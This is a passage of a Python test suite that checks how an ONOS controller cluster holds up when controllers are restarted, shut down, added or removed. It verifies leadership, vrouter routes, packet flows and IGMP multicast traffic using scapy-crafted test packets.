log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
failed = self.verify_leaders(controllers)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return controller
try:
ips = self.get_cluster_current_member_ips(controller = adjacent_controller)
log_test.info('ONOS cluster formed with controllers: %s' %ips)
st = True
except:
st = False
failed = self.verify_leaders(controllers)
if failed:
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
if st is False:
log_test.info('No storage exception and ONOS cluster was not formed successfully')
else:
controller = None
return controller
next_controller = None
tries = self.ITERATIONS
for num in range(tries):
index = num % ctlr_len
#index = random.randrange(0, ctlr_len)
controller_name = onos_map[controllers[index]] if next_controller is None else onos_map[next_controller]
controller = onos_map[controller_name]
log_test.info('ITERATION: %d. Restarting Controller %s' %(num + 1, controller_name))
try:
#enable debug log for the other controllers before restarting this controller
adjacent_controllers = list( set(controllers) - set([controller]) )
self.log_set(controllers = adjacent_controllers)
self.log_set(app = 'io.atomix', controllers = adjacent_controllers)
if graceful is True:
log_test.info('Gracefully shutting down controller: %s' %controller)
self.onos_shutdown(controller)
cord_test_onos_restart(node = controller, timeout = 0)
self.log_set(controllers = controller)
self.log_set(app = 'io.atomix', controllers = controller)
time.sleep(60)
except:
time.sleep(5)
continue
#first archive the test case logs for this run
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
next_controller = check_exception(num, controller = controller)
def test_cluster_controller_restarts(self):
'''Test the cluster by repeatedly killing the controllers'''
self.cluster_controller_restarts()
def test_cluster_graceful_controller_restarts(self):
'''Test the cluster by repeatedly restarting the controllers gracefully'''
self.cluster_controller_restarts(graceful = True)
def test_cluster_single_controller_restarts(self):
'''Test the cluster by repeatedly restarting the same controller'''
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
        #map controller ips to container names before starting the restart iterations
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration, controller, inclusive = False):
adjacent_controllers = list(set(controllers) - set([controller]))
adjacent_controller = adjacent_controllers[0]
controller_list = adjacent_controllers if inclusive == False else controllers
storage_exceptions = []
for node in controller_list:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
storage_exceptions.append(node)
failed = self.verify_leaders(controller_list)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
if storage_exceptions:
log_test.info('Storage exception seen on nodes: %s' %storage_exceptions)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results('test_cluster_single_controller_restarts',
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return controller
for ctlr in controller_list:
ips = self.get_cluster_current_member_ips(controller = ctlr,
nodes_filter = \
lambda nodes: [ n for n in nodes if n['state'] in [ 'ACTIVE', 'READY'] ])
log_test.info('ONOS cluster on node %s formed with controllers: %s' %(ctlr, ips))
if controller in ips and inclusive is False:
                    log_test.info('Controller %s still ACTIVE on Node %s after it was shut down' %(controller, ctlr))
if controller not in ips and inclusive is True:
log_test.info('Controller %s still INACTIVE on Node %s after it was restarted' %(controller, ctlr))
return controller
tries = self.ITERATIONS
        #choose a random controller for shutdown/restarts
controller = controllers[random.randrange(0, ctlr_len)]
controller_name = onos_map[controller]
##enable the log level for the controllers
self.log_set(controllers = controllers)
self.log_set(app = 'io.atomix', controllers = controllers)
for num in range(tries):
log_test.info('ITERATION: %d. Shutting down Controller %s' %(num + 1, controller_name))
try:
cord_test_onos_shutdown(node = controller)
time.sleep(20)
except:
time.sleep(5)
continue
#check for exceptions on the adjacent nodes
check_exception(num, controller)
#Now restart the controller back
log_test.info('Restarting back the controller %s' %controller_name)
cord_test_onos_restart(node = controller)
self.log_set(controllers = controller)
self.log_set(app = 'io.atomix', controllers = controller)
time.sleep(60)
#archive the logs for this run
CordLogger.archive_results('test_cluster_single_controller_restarts',
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
check_exception(num, controller, inclusive = True)
def test_cluster_restarts(self):
'''Test the cluster by repeatedly restarting the entire cluster'''
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
        #map controller ips to container names before starting the restart iterations
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration):
controller_list = controllers
storage_exceptions = []
for node in controller_list:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
storage_exceptions.append(node)
failed = self.verify_leaders(controller_list)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
if storage_exceptions:
log_test.info('Storage exception seen on nodes: %s' %storage_exceptions)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results('test_cluster_restarts',
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return
for ctlr in controller_list:
ips = self.get_cluster_current_member_ips(controller = ctlr,
nodes_filter = \
lambda nodes: [ n for n in nodes if n['state'] in [ 'ACTIVE', 'READY'] ])
log_test.info('ONOS cluster on node %s formed with controllers: %s' %(ctlr, ips))
if len(ips) != len(controllers):
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results('test_cluster_restarts',
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(ips), len(controllers))
tries = self.ITERATIONS
for num in range(tries):
log_test.info('ITERATION: %d. Restarting cluster with controllers at %s' %(num+1, controllers))
try:
cord_test_restart_cluster()
self.log_set(controllers = controllers)
self.log_set(app = 'io.atomix', controllers = controllers)
log_test.info('Delaying before verifying cluster status')
time.sleep(60)
except:
time.sleep(10)
continue
#archive the logs for this run before verification
CordLogger.archive_results('test_cluster_restarts',
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
#check for exceptions on the adjacent nodes
check_exception(num)
#pass
def test_cluster_formation_and_verification(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster exists with %d ONOS instances'%onos_instances)
    #nottest: cluster does not come up properly if a member goes down
def test_cluster_adding_members(self, add = 2, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
onos_instances = len(onos_ips)+add
log_test.info('Adding %d nodes to the ONOS cluster' %add)
cord_test_onos_add_cluster(count = add)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
def test_cluster_removing_master(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
log_test.info('Removing cluster current master %s'%(master))
cord_test_onos_shutdown(node = master)
time.sleep(60)
onos_instances -= 1
status = self.verify_cluster_status(onos_instances = onos_instances,controller=standbys[0])
assert_equal(status, True)
new_master, standbys = self.get_cluster_current_master_standbys(controller=standbys[0])
assert_not_equal(master,new_master)
        log_test.info('Successfully removed the cluster master instance')
def test_cluster_removing_one_member(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
log_test.info('Removing cluster member %s'%standbys[0])
cord_test_onos_shutdown(node = standbys[0])
time.sleep(60)
onos_instances -= 1
status = self.verify_cluster_status(onos_instances = onos_instances,controller=master)
assert_equal(status, True)
def test_cluster_removing_two_members(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
log_test.info('Removing cluster member %s'%standbys[0])
cord_test_onos_shutdown(node = standbys[0])
log_test.info('Removing cluster member %s'%standbys[1])
cord_test_onos_shutdown(node = standbys[1])
time.sleep(60)
onos_instances = onos_instances - 2
status = self.verify_cluster_status(onos_instances = onos_instances,controller=master)
assert_equal(status, True)
def test_cluster_removing_N_members(self,remove = 2, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
for i in range(remove):
member_onos_name = onos_names_ips[standbys[i]]
log_test.info('Removing onos container with name %s'%standbys[i])
cord_test_onos_shutdown(node = standbys[i])
time.sleep(60)
onos_instances = onos_instances - remove
status = self.verify_cluster_status(onos_instances = onos_instances, controller=master)
assert_equal(status, True)
    #nottest: cluster does not come up properly if a member goes down
def test_cluster_adding_and_removing_members(self,onos_instances = ONOS_INSTANCES , add = 2, remove = 2):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
onos_instances = len(onos_ips)+add
log_test.info('Adding %d ONOS instances to the cluster'%add)
cord_test_onos_add_cluster(count = add)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Removing %d ONOS instances from the cluster'%remove)
for i in range(remove):
name = '{}-{}'.format(Onos.NAME, onos_instances - i)
log_test.info('Removing onos container with name %s'%name)
cord_test_onos_shutdown(node = name)
time.sleep(60)
onos_instances = onos_instances-remove
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
    #nottest: cluster does not come up properly if a member goes down
def test_cluster_removing_and_adding_member(self,onos_instances = ONOS_INSTANCES,add = 1, remove = 1):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
onos_instances = onos_instances-remove
log_test.info('Removing %d ONOS instances from the cluster'%remove)
for i in range(remove):
name = '{}-{}'.format(Onos.NAME, len(onos_ips)-i)
log_test.info('Removing onos container with name %s'%name)
cord_test_onos_shutdown(node = name)
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Adding %d ONOS instances to the cluster'%add)
cord_test_onos_add_cluster(count = add)
onos_instances = onos_instances+add
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
def test_cluster_restart(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Restarting cluster')
cord_test_onos_restart()
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
def test_cluster_master_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
log_test.info('Restarting cluster master %s'%master)
cord_test_onos_restart(node = master)
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up after master restart as expected')
    #test fails: the master changes after restart; the correct behavior still needs to be confirmed
def test_cluster_master_ip_after_master_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master1, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master1]
log_test.info('Restarting cluster master %s'%master1)
cord_test_onos_restart(node = master1)
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master2, standbys = self.get_cluster_current_master_standbys()
assert_equal(master1,master2)
log_test.info('Cluster master is same before and after cluster master restart as expected')
def test_cluster_one_member_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
log_test.info('Restarting cluster member %s'%standbys[0])
cord_test_onos_restart(node = standbys[0])
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up as expected after restarting one member')
def test_cluster_two_members_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
log_test.info('Restarting cluster members %s and %s'%(standbys[0],standbys[1]))
cord_test_onos_restart(node = standbys[0])
cord_test_onos_restart(node = standbys[1])
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up as expected after restarting two members')
def test_cluster_state_with_N_members_restart(self, members = 2, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status,True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
for i in range(members):
member_onos_name = onos_names_ips[standbys[i]]
log_test.info('Restarting cluster member %s'%standbys[i])
cord_test_onos_restart(node = standbys[i])
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up as expected after restarting %d members'%members)
def test_cluster_state_with_master_change(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
log_test.info('Cluster current master of devices is %s'%master)
self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Cluster master changed successfully')
#tested on single onos setup.
def test_cluster_with_vrouter_routes_in_cluster_members(self,networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
for onos_ip in onos_ips:
tries = 0
flag = False
try:
self.cliEnter(controller = onos_ip)
while tries <= 5:
routes = json.loads(self.cli.routes(jsonFormat = True))
if routes:
assert_equal(len(routes['routes4']), networks)
self.cliExit()
flag = True
break
else:
tries += 1
time.sleep(1)
assert_equal(flag, True)
except:
                log_test.info('Exception occurred while checking routes in onos instance %s'%onos_ip)
raise
#tested on single onos setup.
def test_cluster_with_vrouter_and_master_down(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res,True)
cord_test_onos_shutdown(node = master)
time.sleep(60)
log_test.info('Verifying vrouter traffic after cluster master is down')
self.vrouter.vrouter_traffic_verify()
#tested on single onos setup.
def test_cluster_with_vrouter_and_restarting_master(self,networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
cord_test_onos_restart()
self.vrouter.vrouter_traffic_verify()
#tested on single onos setup.
def test_cluster_deactivating_vrouter_app(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
self.vrouter.vrouter_activate(deactivate=True)
time.sleep(15)
self.vrouter.vrouter_traffic_verify(positive_test=False)
self.vrouter.vrouter_activate(deactivate=False)
#tested on single onos setup.
def test_cluster_deactivating_vrouter_app_and_making_master_down(self,networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.vrouter.setUpClass()
log_test.info('Verifying vrouter before master down')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
self.vrouter.vrouter_activate(deactivate=True)
log_test.info('Verifying vrouter traffic after app deactivated')
        time.sleep(15) ## wait for the vrouter app deactivation to take effect
self.vrouter.vrouter_traffic_verify(positive_test=False)
log_test.info('Verifying vrouter traffic after master down')
cord_test_onos_shutdown(node = master)
time.sleep(60)
self.vrouter.vrouter_traffic_verify(positive_test=False)
self.vrouter.vrouter_activate(deactivate=False)
#tested on single onos setup.
def test_cluster_for_vrouter_app_and_making_member_down(self, networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
self.vrouter.setUpClass()
log_test.info('Verifying vrouter before cluster member down')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True) # Expecting vrouter should work properly
log_test.info('Verifying vrouter after cluster member down')
cord_test_onos_shutdown(node = standbys[0])
time.sleep(60)
        self.vrouter.vrouter_traffic_verify() # Expecting vrouter to work properly after a cluster member goes down
#tested on single onos setup.
def test_cluster_for_vrouter_app_and_restarting_member(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[1]]
self.vrouter.setUpClass()
log_test.info('Verifying vrouter traffic before cluster member restart')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True) # Expecting vrouter should work properly
cord_test_onos_restart(node = standbys[1])
log_test.info('Verifying vrouter traffic after cluster member restart')
        self.vrouter.vrouter_traffic_verify() # Expecting vrouter to work properly after a cluster member restarts
#tested on single onos setup.
def test_cluster_for_vrouter_app_restarting_cluster(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
self.vrouter.setUpClass()
log_test.info('Verifying vrouter traffic before cluster restart')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True) # Expecting vrouter should work properly
cord_test_onos_restart()
log_test.info('Verifying vrouter traffic after cluster restart')
        self.vrouter.vrouter_traffic_verify() # Expecting vrouter to work properly after the cluster restarts
#test fails because flow state is in pending_add in onos
def test_cluster_for_flows_of_udp_port_and_making_master_down(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.flows.setUpClass()
egress = 1
ingress = 2
egress_map = { 'ip': '192.168.30.1', 'udp_port': 9500 }
ingress_map = { 'ip': '192.168.40.1', 'udp_port': 9000 }
flow = OnosFlowCtrl(deviceId = self.device_id,
egressPort = egress,
ingressPort = ingress,
udpSrc = ingress_map['udp_port'],
udpDst = egress_map['udp_port'],
controller=master
)
result = flow.addFlow()
assert_equal(result, True)
time.sleep(1)
self.success = False
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Pkt seen with ingress UDP port %s, egress UDP port %s' %(pkt[UDP].sport, pkt[UDP].dport))
self.success = True
sniff(timeout=2,
lfilter = lambda p: UDP in p and p[UDP].dport == egress_map['udp_port']
and p[UDP].sport == ingress_map['udp_port'], prn = recv_cb, iface = self.flows.port_map[egress])
for i in [0,1]:
if i == 1:
cord_test_onos_shutdown(node = master)
log_test.info('Verifying flows traffic after master killed')
time.sleep(45)
else:
log_test.info('Verifying flows traffic before master killed')
t = threading.Thread(target = mac_recv_task)
t.start()
L2 = self.flows_eth #Ether(src = ingress_map['ether'], dst = egress_map['ether'])
L3 = IP(src = ingress_map['ip'], dst = egress_map['ip'])
L4 = UDP(sport = ingress_map['udp_port'], dport = egress_map['udp_port'])
pkt = L2/L3/L4
log_test.info('Sending packets to verify if flows are correct')
sendp(pkt, count=50, iface = self.flows.port_map[ingress])
t.join()
assert_equal(self.success, True)
def test_cluster_state_changing_master_and_flows_of_ecn(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
self.flows.setUpClass()
egress = 1
ingress = 2
egress_map = { 'ip': '192.168.30.1' }
ingress_map = { 'ip': '192.168.40.1' }
flow = OnosFlowCtrl(deviceId = self.device_id,
egressPort = egress,
ingressPort = ingress,
ecn = 1,
controller=master
)
result = flow.addFlow()
assert_equal(result, True)
##wait for flows to be added to ONOS
time.sleep(1)
self.success = False
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Pkt seen with ingress ip %s, egress ip %s and Type of Service %s' %(pkt[IP].src, pkt[IP].dst, pkt[IP].tos))
self.success = True
sniff(count=2, timeout=5,
lfilter = lambda p: IP in p and p[IP].dst == egress_map['ip'] and p[IP].src == ingress_map['ip']
and int(bin(p[IP].tos).split('b')[1][-2:],2) == 1,prn = recv_cb,
iface = self.flows.port_map[egress])
for i in [0,1]:
if i == 1:
log_test.info('Changing cluster master to %s'%standbys[0])
self.change_master_current_cluster(new_master=standbys[0])
                log_test.info('Verifying flow traffic after cluster master changed')
else:
log_test.info('Verifying flow traffic before cluster master changed')
t = threading.Thread(target = mac_recv_task)
t.start()
L2 = self.flows_eth # Ether(src = ingress_map['ether'], dst = egress_map['ether'])
L3 = IP(src = ingress_map['ip'], dst = egress_map['ip'], tos = 1)
pkt = L2/L3
log_test.info('Sending a packet to verify if flows are correct')
sendp(pkt, count=50, iface = self.flows.port_map[ingress])
t.join()
assert_equal(self.success, True)
#pass
def test_cluster_flow_for_ipv6_extension_header_and_master_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.flows.setUpClass()
egress = 1
ingress = 2
egress_map = { 'ipv6': '2001:db8:a0b:12f0:1010:1010:1010:1001' }
ingress_map = { 'ipv6': '2001:db8:a0b:12f0:1010:1010:1010:1002' }
flow = OnosFlowCtrl(deviceId = self.device_id,
egressPort = egress,
ingressPort = ingress,
ipv6_extension = 0,
controller=master
)
result = flow.addFlow()
assert_equal(result, True)
##wait for flows to be added to ONOS
time.sleep(1)
self.success = False
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Pkt seen with ingress ip %s, egress ip %s, Extension Header Type %s'%(pkt[IPv6].src, pkt[IPv6].dst, pkt[IPv6].nh))
self.success = True
sniff(timeout=2,count=5,
lfilter = lambda p: IPv6 in p and p[IPv6].nh == 0, prn = recv_cb, iface = self.flows.port_map[egress])
for i in [0,1]:
if i == 1:
log_test.info('Restart cluster current master %s'%master)
Container(master_onos_name,Onos.IMAGE).restart()
time.sleep(45)
log_test.info('Verifying flow traffic after master restart')
else:
log_test.info('Verifying flow traffic before master restart')
t = threading.Thread(target = mac_recv_task)
t.start()
L2 = self.flows_eth
L3 = IPv6(src = ingress_map['ipv6'] , dst = egress_map['ipv6'], nh = 0)
pkt = L2/L3
log_test.info('Sending packets to verify if flows are correct')
sendp(pkt, count=50, iface = self.flows.port_map[ingress])
t.join()
assert_equal(self.success, True)
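    #send a burst of multicast data packets for the given group from the given source ip on the given interface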
def send_multicast_data_traffic(self, group, intf= 'veth2',source = '1.2.3.4'):
dst_mac = self.igmp.iptomac(group)
eth = Ether(dst= dst_mac)
ip = IP(dst=group,src=source)
data = repr(monotonic.monotonic())
sendp(eth/ip/data,count=20, iface = intf)
pkt = (eth/ip/data)
        log_test.info('multicast traffic packet %s'%pkt.summary())
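    #sniff for multicast data of the given group on the receive interface while sending traffic; returns True if the traffic is seen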
def verify_igmp_data_traffic(self, group, intf='veth0', source='1.2.3.4' ):
log_test.info('verifying multicast traffic for group %s from source %s'%(group,source))
self.success = False
def recv_task():
def igmp_recv_cb(pkt):
log_test.info('multicast data received for group %s from source %s'%(group,source))
self.success = True
            sniff(prn = igmp_recv_cb,lfilter = lambda p: IP in p and p[IP].dst == group and p[IP].src == source, count=1,timeout = 2, iface = intf)
t = threading.Thread(target = recv_task)
t.start()
self.send_multicast_data_traffic(group,source=source)
t.join()
return self.success
#pass
def test_cluster_with_igmp_include_exclude_modes_and_restarting_master(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.igmp.setUp(controller=master)
groups = ['224.2.3.4','230.5.6.7']
src_list = ['2.2.2.2','3.3.3.3']
self.igmp.onos_ssm_table_load(groups, src_list=src_list, controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
self.igmp.send_igmp_join(groups = [groups[1]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_EXCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[1])
assert_equal(status,False)
log_test.info('restarting cluster master %s'%master)
Container(master_onos_name,Onos.IMAGE).restart()
time.sleep(60)
log_test.info('verifying multicast data traffic after master restart')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[1])
assert_equal(status,False)
#pass
def test_cluster_with_igmp_include_exclude_modes_and_making_master_down(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip(),self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
self.igmp.send_igmp_join(groups = [groups[1]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_EXCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[0])
assert_equal(status,False)
log_test.info('Killing cluster master %s'%master)
Container(master_onos_name,Onos.IMAGE).kill()
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances-1,controller=standbys[0])
assert_equal(status, True)
log_test.info('Verifying multicast data traffic after cluster master down')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[0])
assert_equal(status,False)
def test_cluster_with_igmp_include_mode_checking_traffic_recovery_time_after_master_is_down(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
